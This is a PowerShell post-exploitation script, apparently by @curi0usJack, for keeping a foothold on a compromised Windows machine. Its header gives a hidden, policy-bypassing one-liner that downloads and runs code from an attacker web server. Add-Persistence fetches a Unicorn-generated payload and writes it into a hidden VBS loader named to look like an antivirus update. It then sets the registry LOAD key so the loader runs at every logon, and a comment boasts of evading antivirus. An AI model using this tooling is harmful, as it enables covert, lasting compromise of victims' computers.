PersistenceMetasploit2

1. # powershell-persistence.ps1
2. # Author: @curi0usJack
3. #
4. # Assumes your target has the ability to download files
5. #
6. # 1) Use Unicorn to generate your encoded powershell command. This command will be used for persistence when the user logs in.
7. # 2) Save to a text file somewhere you can download it.
8. # 3) Call this from your shell:
9. #   powershell.exe -window hidden -exec bypass -noni -c "IEX (New-Object Net.WebClient).DownloadString('http://WEBSERVER/powershell-persist.ps1'); Add-Persistence http://WEBSERVER/powershell_attack.txt"
10. #
11. # Kudos to @slobtresix for the initial model. Modified to work directly with unicorn payloads.
12. #
13. #
14. function Add-Persistence()
15. {
16.     param
17.     (
18.         [parameter(Mandatory=$true)]
19.         [string]
20.         $payloadurl
21.     )
22.    
23.     # Default saving the payload to the %TEMP% directory
24.     $tmpdir = $env:APPDATA
25.    
26.     # Change this if desired.
27.     $payloadvbsloaderpath = "$tmpdir\update-avdefs.vbs"
28.  
29.     # Determine if user is admin. Not required, but nice to know.
30.     $admin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
31.     if ($admin -eq $true)
32.         { Write-Host "[+] User is a local administrator!" }
33.     else
34.         { Write-Host "[-] User is not a local administrator." }
35.  
36.     # Download and verify the payload.
37.     Write-Host "[+] Downloading payload $payloadurl"
38.     $payload = (New-Object Net.WebClient).DownloadString($payloadurl)
39.    
40.     $payloadlength = $payload.Length
41.     if ($payloadlength -gt 0)
42.         { Write-Host "[+] Payload length: $payloadlength bytes" }
43.     else
44.     {
45.         Write-Host "[!] Payload length: 0 characters. Is the web server up?"
46.         return
47.     }
48.    
49.     # Create the VBS file and insert the powershell command from unicorn.
50.     Write-Host "[+] Creating VBS loader."
51.     $vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
52.     $vbs += "ps = ""$payload""`r`n"
53.     $vbs += "oShell.run(ps),0,true"
54.     $vbs | Out-File $payloadvbsloaderpath -Force
55.    
56.     # Mark the file as hidden.
57.     Write-Host "[+] Marking $payloadvbsloaderpath as Hidden."
58.     $fileObj = get-item $payloadvbsloaderpath -Force
59.     $fileObj.Attributes="Hidden"
60.    
61.     # Set the LOAD key. Haven't been caught by AV yet. ;-)
62.     Write-Host "[+] Updating registry with a LOAD key"
63.     Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" -Name LOAD -Value $payloadvbsloaderpath
64.  
65.     Write-Host "[+] Done!"
66. }
67.  
68. function Remove-Persistence()
69. {
70.     $appdir = $env:APPDATA
71.     $payload = "$appdir\update-avdefs.vbs"
72.    
73.     if (Test-Path $payload)
74.     {
75.         Remove-Item -Path $payload -Force
76.         Write-Host "[+] Found and removed $payload."
77.     }
78.     else
79.         { Write-Host "[-] $payload not found." }
80.        
81.     $reg = Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
82.     if ($reg.LOAD -eq $payload)
83.     {
84.         Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows" -Name LOAD
85.         Write-Host "[+] Found and removed LOAD registry key."
86.     }
87.     else
88.         { Write-Host "[-] LOAD registry key not found." }
89.    
90.     Write-Host "[+] Done."
91. }